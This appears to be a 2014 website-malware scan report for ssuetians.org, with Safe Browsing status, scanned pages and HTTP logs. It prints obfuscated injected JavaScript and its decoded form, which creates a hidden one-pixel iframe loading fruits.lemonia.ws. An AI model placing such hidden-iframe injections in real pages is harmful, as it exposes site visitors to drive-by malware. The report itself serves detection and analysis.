Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ssuetians.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ssuetians.org/ | 200 OK Content-Length: 6149 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var W8RAJ="797a3E";var R2ij4P1="UC65UC6DUC65UC6";var SxsQ97="7a767a507a347a";var ookN="(unescape";var aElY3ukq="p9YF='9V%469V%";var WsE4="%4E9V%42";var lIGVr="227a3C7";var pU8Y="DUC65UC6";pU8Y="C6FUC63UC75UC6"+pU8Y;var BPg3BX="7a657a6E7a747";var ZWWeo1h="277a2B7a";var ay7ixd9Z="6FUC7y9XUC";var c6EZv="XUC6CUC27UC3";var uV6ta="J.replace(/5V";var j30SfRAD="79V%3B9V%4";var oSZLpGm7="6E7a747a2E7a67";var hW2NS="797a3D7a3D7a6";var V2qQ="277a3E7a3C";var MdVNo=" ...[4318 bytes skipped]... Decoded script: ...[3733 bytes skipped]... lt;div id='G7vP4fgi'></div>";if(document.body==null)rO6LbND='<body>'+rO6LbND+'</body>';document.write (rO6LbND);var ipKe=document.getElementById('G7vP4fgi'); var rO6LbND="<div id='G7vP4fgi'></div>";if(document.body==null)rO6LbND='<body>'+rO6LbND+'</body>';document.write (rO6LbND);var ipKe=document.getElementById('G7vP4fgi'); var FVora=document.createElement('iframe');FVora.src='http://fruits.lemonia.ws/Tbl'; var FVora=document.createElement('iframe');FVora.src='http://fruits.lemonia.ws/Tbl'; FVora.width='1';FVora.height='1';FVora.name='zhq4NBm';FVora.style.visibility='hidden'; FVora.width='1';FVora.height='1';FVora.name='zhq4NBm';FVora.style.visibility='hidden'; <div id='G7vP4fgi'></div> | ||
http://ssuetians.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ssuetians.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 17:24:31 GMT
Accept-Ranges: bytes
ETag: "8e02f3-1805-3e7728e21cdc0"
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 6149
Content-Type: text/html
Last-Modified: Wed, 27 Oct 2004 19:08:47 GMT
...6149 bytes of data.
GET / HTTP/1.1
Host: ssuetians.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 17:24:31 GMT
Accept-Ranges: bytes
ETag: "8e02f3-1805-3e7728e21cdc0"
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 6149
Content-Type: text/html
Last-Modified: Wed, 27 Oct 2004 19:08:47 GMT
...6149 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ssuetians.org
Referer: http://www.google.com/search?q=ssuetians.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ssuetians.org
Referer: http://www.google.com/search?q=ssuetians.org
Result:
The result is similar to the first query. There are no suspicious redirects found.